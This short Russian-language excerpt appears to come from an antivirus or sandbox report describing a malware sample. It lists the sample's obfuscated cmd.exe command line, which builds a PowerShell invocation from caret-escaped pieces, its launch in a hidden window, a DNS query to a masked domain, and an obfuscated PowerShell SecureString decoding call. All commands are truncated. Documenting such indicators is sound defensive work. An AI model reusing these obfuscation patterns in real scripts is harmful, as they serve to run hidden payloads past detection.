Техническая информация
- '<SYSTEM32>\cmd.exe' jmcdOMn YuijFuICTsXTrn ihNJAmW & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %vAJrAiPQKkGNvdN%=LAcbsNYqdUDRvd&&set %pzuElWVUF%=p&&set %wrmSzGUHul%=o^w&&set %fapj...
- DNS ASK zi#####eqwfwehif.com
- '<SYSTEM32>\cmd.exe' jmcdOMn YuijFuICTsXTrn ihNJAmW & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %vAJrAiPQKkGNvdN%=LAcbsNYqdUDRvd&&set %pzuElWVUF%=p&&set %wrmSzGUHul%=o^w&&set %fapj...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' " ([rUnTIMe.InteRoPSeRViCes.MaRSHAL]::([RuNtIME.INterOpsERviceS.mArShAl].getmemBErs()[5].name).INVOkE( [runTiMe.InTerOpSERVIcEs.maRSHal]::seCuRestRiNGtObSTr( $('76492d1116743f0423413b16050a5345...